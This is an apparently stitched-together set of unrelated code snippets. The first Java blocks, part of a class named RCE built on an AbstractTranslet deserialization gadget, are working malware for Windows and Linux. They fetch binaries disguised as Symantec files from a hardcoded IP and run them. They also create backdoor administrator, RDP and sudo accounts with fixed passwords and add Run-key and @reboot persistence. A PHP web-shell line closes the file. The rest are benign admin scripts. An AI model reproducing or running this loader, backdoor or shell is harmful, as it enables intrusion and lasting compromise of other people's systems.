```java
// Windows branch: fetch the payload, launch it, create a local admin/RDP account,
// and register the payload under the HKLM Run key for persistence.
this.download("http://148.251.71.182/symantec.tmp", "c:\\windows\\temp\\dllhost.exe;");
String win_cmd = "Start-Process c:\\windows\\temp\\dllhost.exe;";
win_cmd += "net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user DefaultAccount P@ssw0rd12341234; net localgroup Administrators /add DefaultAccount; net localgroup 'Remote Desktop Users' /add DefaultAccount; Set-LocalUser -Name DefaultAccount -PasswordNeverExpires 1;";
win_cmd += "New-Itemproperty -path 'HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'DllHost' -value 'c:\\windows\\temp\\dllhost.exe' -PropertyType 'String' -Force;";
final String[] arrayOfString = { "powershell", "-c Invoke-Command", "{" + win_cmd + "}" };
try {
    Runtime.getRuntime().exec(arrayOfString);
}
catch (IOException iOException) {
    iOException.printStackTrace();
}
```
```java
// Linux branch: fetch the payload to /tmp/lock, add a sudo-group user,
// start the payload, and add an @reboot crontab entry for persistence.
this.download("http://148.251.71.182/symantec_linux.x86", "/tmp/lock");
final String linux_cmd = "chmod +x /tmp/lock ; useradd -g sudo -m -s /bin/bash -p $(echo P@ssw0rd1234 | openssl passwd -1 -stdin) master; nohup /tmp/lock &";
final String[] arrayOfString = { "/bin/sh", "-c", linux_cmd };
try {
    Runtime.getRuntime().exec(arrayOfString);
    Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "(crontab -l && echo \"@reboot /tmp/lock\") | crontab -" });
} catch (IOException iOException) {
    iOException.printStackTrace();
}
```
```java
public class RCE extends AbstractTranslet
{
    public RCE() {
        // File.separator is "/" on Unix-like hosts, so this selects the branch by OS.
        if (File.separator.equals("/")) {
            ...
        } else {
            ...
        }
    }
}
```
```powershell
&{Get-VM | ?{$_.PowerState -eq "PoweredOn"} | %{
    $strVMName = $_.Name; Get-NetworkAdapter -VM $_ |
        select @{n="VMName"; e={$strVMName}},Name,NetworkName,ConnectionState} |
    ?{$_.ConnectionState.Connected -eq $false}} |
    Export-Csv ./nic_report.csv -NoTypeInformation -UseCulture
```
```ini
[Unit]
Description=Remote desktop service (VNC)
After=syslog.target network.target

[Service]
Type=simple
User=kali
PIDFile=/home/kali/.vnc/%H:%i.pid
ExecStartPre=/bin/sh -c '/usr/bin/vncserver -kill :%i > /dev/null 2>&1 || :'
ExecStart=/usr/bin/vncserver -localhost no -alwaysshared :%i
```
```applescript
set outputText to ""
set outputApplication to ""
set listOfProcesses to {}

# Get the text to type via the action script
set outputText to the text returned of (display dialog "Text to Type:" default answer "")

# Quit if nothing was input
if outputText is "" then
    error number -128
end if
```
```bash
#!/bin/bash
# Usage: ./reachable_test.sh <ip> <port>
# EX:
# cat ips.txt | while read ip; do ./checkScript.sh $ip <interesting_port> | tee -a scan.txt; done

# nc -z only checks whether the port accepts a connection; give up after 0.8 s.
if timeout 0.8 nc -z "$1" "$2" 2>/dev/null; then
    echo "$1 reachable"
else
    echo "$1 not reachable"
fi
```
```python
import os
from paramiko import SSHClient, AutoAddPolicy, RSAKey
from paramiko.auth_handler import AuthenticationException, SSHException
from pathlib import Path


class SSHer():
    def __init__(self, remote_host, user, key_path):
        self.remote_host = remote_host
        self.ssh_key_path = key_path
```
```python
#!/usr/local/bin/python3
import os, sys
from pathlib import Path


def parseDirectories(rootdir):
    for subdir, dirs, files in os.walk(rootdir):
        for file in files:
            # Skip macOS Finder metadata files
            if ('.DS_Store' in file):
                continue
```
```php
<?php echo shell_exec("id") ?>
```